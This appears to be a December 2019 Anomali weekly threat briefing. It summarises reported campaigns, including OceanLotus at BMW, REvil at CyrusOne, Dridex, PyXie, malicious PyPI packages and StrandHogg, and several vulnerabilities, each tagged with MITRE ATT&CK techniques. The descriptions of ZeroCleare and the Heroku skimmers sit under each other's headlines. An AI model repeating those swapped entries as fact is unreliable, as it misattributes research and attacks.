<div id="weekly"><p>The intelligence in this week’s iteration discuss the following threats: <strong>APT33, BankBot, CryusOne, Dridex, Magecart, Python, PyXie, OceanLotus, REvil, StrangHogg</strong>, The IOCs related to these stories are attached to the Community Threat Briefing and can be used to check your logs for potential malicious activity.</p><p id="intro"><img src="https://anomali-labs-public.s3.amazonaws.com/img/532903.png "/><br/> <b>Figure 1 - IOC Summary Charts.  These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.</b></p><div id="trending-threats"><h2 id="trendingthreats">Trending Threats</h2><p><a href="https://www.bleepingcomputer.com/news/security/clever-microsoft-phishing-scam-creates-a-local-login-form/" target="_blank"><b>Clever Microsoft Phishing Scam Creates A Local Login Form</b></a> (<i>December 7, 2019</i>)<br/> A phishing campaign has been identified by ISC Handler, Jan Kopriva. The campaign contains the landing page inside a Hypertext Text Markup Language (HTML) attachment, as opposed to typically redirecting the user to another site. The HTML file is sent in a phishing email as an attachment, with the file containing a large amount of obfuscated Javascript. Once opened, a login form is opened in the user’s browser for a number of email providers including AOL, Gmail, Hotmail, Office 365, and Yahoo. These credentials are then sent to a remote site. With the login form being generated locally, the threat actor is able to go undetected, and do not need to register domains.<br/> <a href="https://forum.anomali.com/t/clever-microsoft-phishing-scam-creates-a-local-login-form/4421" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947201">[MITRE ATT&amp;CK] Scripting - T1064</a> | <a href="https://ui.threatstream.com/ttp/947087">[MITRE ATT&amp;CK] Credential Dumping - T1003</a> | <a href="https://ui.threatstream.com/ttp/947180">[MITRE ATT&amp;CK] Spearphishing Attachment - T1193</a><br/>  </p><p><a href="https://www.tagesschau.de/investigativ/br-recherche/bmw-hacker-101.html" target="_blank"><b>BMW Hacked By Hackers</b></a> (<i>December 6, 2019</i>)<br/> Malicious actors have breached BMW’s computer system. Using the “Cobalt Strike” malware, the threat actors were able to gain remote access to gather information and control the system. The actors gather information from the system in order to help spread and expand upon more systems. Due to the methods and tools used in this attack, it is believed a Vietnamese group, with suspected state ties, called “OceanLotus” are responsible. According to Dror-John Röcher from Deutsche Cybersicherheitsorganisation (DCSO), an IT security firm, OceanLotus began targeting automotive companies during the time Vietnam started building cars. A security expert claims no sensitive data should be leaked due to this breach.<br/> <a href="https://forum.anomali.com/t/bmw-hacked-by-hackers/4422" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947278">[MITRE ATT&amp;CK] Remote File Copy - T1105</a> | <a href="https://ui.threatstream.com/ttp/947125">[MITRE ATT&amp;CK] System Information Discovery - T1082</a> | <a href="https://ui.threatstream.com/ttp/947269">[MITRE ATT&amp;CK] Access Token Manipulation - T1134</a> | <a href="https://ui.threatstream.com/ttp/947257">[MITRE ATT&amp;CK] BITS Jobs - T1197</a> | <a href="https://ui.threatstream.com/ttp/947258">[MITRE ATT&amp;CK] Bypass User Account Control - T1088</a> | <a href="https://ui.threatstream.com/ttp/947191">[MITRE ATT&amp;CK] Command-Line Interface - T1059</a> | <a href="https://ui.threatstream.com/ttp/947291">[MITRE ATT&amp;CK] Commonly Used Port - T1043</a> | <a href="https://ui.threatstream.com/ttp/947289">[MITRE ATT&amp;CK] Custom Command and Control Protocol - T1094</a> | <a href="https://ui.threatstream.com/ttp/947130">[MITRE ATT&amp;CK] Execution through API - T1106</a> | <a href="https://ui.threatstream.com/ttp/947244">[MITRE ATT&amp;CK] Exploitation for Client Execution - T1203</a> | <a href="https://ui.threatstream.com/ttp/947194">[MITRE ATT&amp;CK] Indicator Removal on Host - T1070</a> | <a href="https://ui.threatstream.com/ttp/947276">[MITRE ATT&amp;CK] Network Service Scanning - T1046</a> | <a href="https://ui.threatstream.com/ttp/947287">[MITRE ATT&amp;CK] PowerShell - T1086</a> | <a href="https://ui.threatstream.com/ttp/947207">[MITRE ATT&amp;CK] Process Discovery - T1057</a> | <a href="https://ui.threatstream.com/ttp/947127">[MITRE ATT&amp;CK] Scheduled Task - T1053</a> | <a href="https://ui.threatstream.com/ttp/947126">[MITRE ATT&amp;CK] Standard Application Layer Protocol - T1071</a> | <a href="https://ui.threatstream.com/ttp/947231">[MITRE ATT&amp;CK] Valid Accounts - T1078</a> | <a href="https://ui.threatstream.com/ttp/947077">[MITRE ATT&amp;CK] Windows Management Instrumentation - T1047</a></p><p><a href="https://www.bleepingcomputer.com/news/security/us-govt-alerts-financial-services-of-ongoing-dridex-malware-attacks/" target="_blank"><b>US Govt Alerts Financial Services of Ongoing Dridex Malware Attacks</b></a> (<i>December 5, 2019</i>)<br/> The US Cybersecurity and Infrastructure Security Agency (CISA) has issued a warning to financial services about ongoing Dridex attacks. Dridex is a modular banking trojan that targets financial organizations via phishing in attempts to steal banking credentials and has been attributed to the threat group, TA505. CISA have provided a list of recommendations for companies to enact to help prevent against an attack including education on connected devices, macros, network controls, password management, and phishing.<br/> <a href="https://forum.anomali.com/t/us-govt-alerts-financial-services-of-ongoing-dridex-malware-attacks/4423" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947087">[MITRE ATT&amp;CK] Credential Dumping - T1003</a> | <a href="https://ui.threatstream.com/ttp/947190">[MITRE ATT&amp;CK] Connection Proxy - T1090</a> | <a href="https://ui.threatstream.com/ttp/947126">[MITRE ATT&amp;CK] Standard Application Layer Protocol - T1071</a> | <a href="https://ui.threatstream.com/ttp/947150">[MITRE ATT&amp;CK] Standard Cryptographic Protocol - T1032</a></p><p><a href="https://www.zdnet.com/article/ransomware-attack-hits-major-us-data-center-provider/" target="_blank"><b>Ransomware Attack Hits Major US Data Center Provider</b></a> (<i>December 5, 2019</i>)<br/> One of the largest data center providers in the US, CyrusOne, has been hit by REvil ransomware, ZDNet are reporting. The attack, which was targeted against the company has not been disclosed by the company. CyrusOne reportedly are not planning on paying the ransom, and are working with law enforcement to investigate and help customers restore lost data.<br/> <a href="https://forum.anomali.com/t/ransomware-attack-hits-major-us-data-center-provider/4424" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947266">[MITRE ATT&amp;CK] <b>Tags:</b> CyrusOne, Ransomware, REvil</a></p><p><a href="https://www.darkreading.com/vulnerabilities---threats/attackers-can-circumvent-outlook-homepage-flaw/d/d-id/1336513" target="_blank"><b>Attackers Continue to Exploit Outlook Home Page Flaw</b></a> (<i>December 4, 2019</i>)<br/> A two-year old vulnerability in Microsoft Outlook is continuing to be exploited. The vulnerability, registered as “CVE-2017-11774”, allows code to run when the Outlook homepage is opened up. Although the vulnerability was patched, threat actors have been able to gain persistence on already infected systems. Two Iranian Advanced Persistent Groups (APT), APT33 and APT34 have been exploiting the vulnerability in their attacks, according to the United States military. To gain persistence, the WebView registry key is modified with an external URL in order to reverse the patch.<br/> <a href="https://forum.anomali.com/t/attackers-continue-to-exploit-outlook-home-page-flaw/4425" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947166">[MITRE ATT&amp;CK] Modify Registry - T1112</a></p><p><a href="https://www.openwall.com/lists/oss-security/2019/12/05/1" target="_blank"><b>CVE-2019-14899 Inferring and Hijacking VPN-Tunneled TCP</b></a> (<i>December 4, 2019</i>)<br/> A vulnerability, registered as “CVE-2019-14899”, has been identified on most Linux/Unix based systems including Android, iOS, and MacOS. The vulnerability can enable an actor to be determined if a user is connected to a VPN, and infer information about traffic sequence allowing for data to be injected into the TCP stream. An attack can occur by an actor gathering the VPN client’s virtual IP, using it to determine active connections, determine the packet sequence and number of active connections to hijack the TCP stream.<br/> <a href="https://forum.anomali.com/t/cve-2019-14899-inferring-and-hijacking-vpn-tunneled-tcp/4426" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947291">[MITRE ATT&amp;CK] Commonly Used Port - T1043</a></p><p><a href="https://www.zdnet.com/article/two-malicious-python-libraries-removed-from-pypi/" target="_blank"><b>Two Malicious Python Libraries Caught Stealing SSH and GPG Keys</b></a> (<i>December 4, 2019</i>)<br/> Two Python libraries have been removed by the Python Security Team, due to the libraries stealing SSH and GPG keys from Python projects. Both libraries utilized typosquatting to imitate legitimate libraries, such as “dateutil”, a popular date library, and “jellyfish”, a string comparison library. The malicious jellyfish package downloads a file that lists directories and attempts to exfiltrate SSH and GPG keys from the user and send to an IP. As the malicious libraries also contained the original, legitimate code, the packages worked as intended allowing the malicious code to go undetected until developers raised concerns.<br/> <a href="https://forum.anomali.com/t/two-malicious-python-libraries-caught-stealing-ssh-and-gpg-keys/4427" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947224">[MITRE ATT&amp;CK] Exfiltration Over Alternative Protocol - T1048</a> | <a href="https://ui.threatstream.com/ttp/947215">[MITRE ATT&amp;CK] Accessibility Features - T1015</a></p><p><a href="https://securityintelligence.com/posts/new-destructive-wiper-zerocleare-targets-energy-sector-in-the-middle-east/" target="_blank"><b>New Destructive Wiper ZeroCleare Targets Energy Sector in the Middle East</b></a> (<i>December 4, 2019</i>)<br/> Malwarebytes Labs security researchers have identified skimmers being hosted on Heroku, a cloud Platform-as-a-Service (PaaS). The web skimming app is injected to ecommerce websites, with a payment overlay to steal the victim’s card payment details and exfiltrated in an encoded format. Due to Heroku’s freemium model, threat actors are able to host skimming code at a low cost, as well as detection being more difficult due to the domain being legitimate.<br/> <a href="https://forum.anomali.com/t/new-destructive-wiper-zerocleare-targets-energy-sector-in-the-middle-east/4428" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947287">[MITRE ATT&amp;CK] PowerShell - T1086</a> | <a href="https://ui.threatstream.com/ttp/947277">[MITRE ATT&amp;CK] Exfiltration Over Physical Medium - T1052</a> | <a href="https://ui.threatstream.com/ttp/947087">[MITRE ATT&amp;CK] Credential Dumping - T1003</a></p><p><a href="https://blog.malwarebytes.com/web-threats/2019/12/theres-an-app-for-that-web-skimmers-found-on-paas-heroku/" target="_blank"><b>There's An App For That: Web Skimmers Found of PaaS Heroku</b></a> (<i>December 4, 2019</i>)<br/> A malware targeting the industrial and energy sectors in the Middle East, has been named “ZeroCleare” by researchers at IBM X-Force. The malware, a wiper, uses the legitimate EldoS tool used for interacting with files, disks and partitions to wipe the master boot record (MBR) and damage disk partitions. By brute-forcing passwords, the actors gain access to network accounts that are used to deploy China Chopper and Tunna web shells. Credential harvesters such as Mimikatz are used to gather and exfiltrate credentials from the victim’s computer. X-Force have determined that actors from OilRig, an Iranian backed group, and another unnamed, likely Iran-based threat group are behind the campaign.<br/> <a href="https://forum.anomali.com/t/theres-an-app-for-that-web-skimmers-found-of-paas-heroku/4429" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947201">[MITRE ATT&amp;CK] Scripting - T1064</a></p><p><a href="https://threatvector.cylance.com/en_us/home/meet-pyxie-a-nefarious-new-python-rat.html" target="_blank"><b>Meet Pyxie: A Nefarious New Python RAT</b></a> (<i>December 2, 2019</i>)<br/> Cylance researchers have identified a Python Remote Access Trojan (RAT) dubbed “PyXie”. While it has been in the wild since at least 2018, the RAT has been observed in an ongoing campaign. The campaign has been targeting multiple industries including education and healthcare, in attempts to send ransomware. Using sideloading, legitimate binaries are used to load the malware, corresponding with the encrypted payload. These are then copied to the directory, and creating a registry value for persistence. The third stage payload, a “Cobalt Mode” downloader, is injected into a process that is selected by searching the System32 directory against the criteria. Cobalt Mode is used to connect to a Command and Control (C2), download and decrypt the payload and carry out environmental checks. PyXie RAT is the final stage payload with the ability for credential harvesting, cookie theft, input capture, output capture, run arbitrary payloads, web injects, Virtual Network Connection (VNC).<br/> <a href="https://forum.anomali.com/t/meet-pyxie-a-nefarious-new-python-rat/4430" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947142">[MITRE ATT&amp;CK] Process Injection - T1055</a> | <a href="https://ui.threatstream.com/ttp/947243">[MITRE ATT&amp;CK] Input Capture - T1056</a> | <a href="https://ui.threatstream.com/ttp/947079">[MITRE ATT&amp;CK] Screen Capture - T1113</a> | <a href="https://ui.threatstream.com/ttp/947266">[MITRE ATT&amp;CK] Data Encrypted - T1022</a> | <a href="https://ui.threatstream.com/ttp/947166">[MITRE ATT&amp;CK] Modify Registry - T1112</a> | <a href="https://ui.threatstream.com/ttp/947087">[MITRE ATT&amp;CK] Credential Dumping - T1003</a> | <a href="https://ui.threatstream.com/ttp/947136">[MITRE ATT&amp;CK] Deobfuscate/Decode Files or Information - T1140</a></p><p><a href="https://safebreach.com/Post/Autodesk-Desktop-Application-Privilege-Escalation-to-SYSTEM-N40-CVE-2019-7365-N41" target="_blank"><b>Autodesk Desktop Application - Privilege Escalation to SYSTEM (CVE-2019-7365)</b></a> (<i>December 2, 2019</i>)<br/> Researchers at SafeBreach Labs have discovered a vulnerability in the Autodesk Desktop Application (ADA) that can be used to achieve privilege escalation and persistence on Windows desktop systems. ADA is a companion application to Microsoft Windows-based products that delivers security patches and updates to subscribers. The vulnerability, “CVE-2019-7365,” is a DLL preloading vulnerability which can give a malicious actor the ability to load and execute a malicious DLL file into the working directory. The vulnerability can be leveraged to load and execute payloads each time the service is loaded, providing persistence, and the actor can operate as NT AUTHORITY/SYSTEM, the most powerful administrative account on a Windows local instance. SafeBreach reported the vulnerability to Autodesk, and a patch is now available as of November 27.<br/> <a href="https://forum.anomali.com/t/autodesk-desktop-application-privilege-escalation-to-system-cve-2019-7365/4431" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947232">[MITRE ATT&amp;CK] DLL Side-Loading - T1073</a></p><p><a href="https://www.bleepingcomputer.com/news/security/actively-exploited-strandhogg-vulnerability-affects-android-os/" target="_blank"><b>Actively Exploited StrandHogg Vulnearbility Affects Android OS</b></a> (<i>December 2, 2019</i>)<br/> The newly identified Android vulnerability, named “StrandHogg” by Promon researchers, is being exploited by BankBot banking Trojan. The vulnerability, if exploited, enables malicious applications to masquerade as a legitimate application due to a flaw in the Android “taskAffinity” setting that allows any app to assume the identity of the app in the multitasking system. If exploited, an attacker can access the microphone and camera, get location data, read SMS messages, request permissions enabling theft of credentials and banking information. Currently 36 applications including BankBot have been identified as exploiting the vulnerability.<br/> <a href="https://forum.anomali.com/t/actively-exploited-strandhogg-vulnearbility-affects-android-os/4432" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/1260052">[MITRE MOBILE-ATT&amp;CK] Access Contact List - T1432</a> | <a href="https://ui.threatstream.com/ttp/1260088">[MITRE MOBILE-ATT&amp;CK] Location Tracking - T1430</a> | <a href="https://ui.threatstream.com/ttp/1260117">[MITRE MOBILE-ATT&amp;CK] Standard Application Layer Protocol - T1437</a> | <a href="https://ui.threatstream.com/ttp/1260119">[MITRE MOBILE-ATT&amp;CK] System Information Discovery - T1426</a></p></div></div>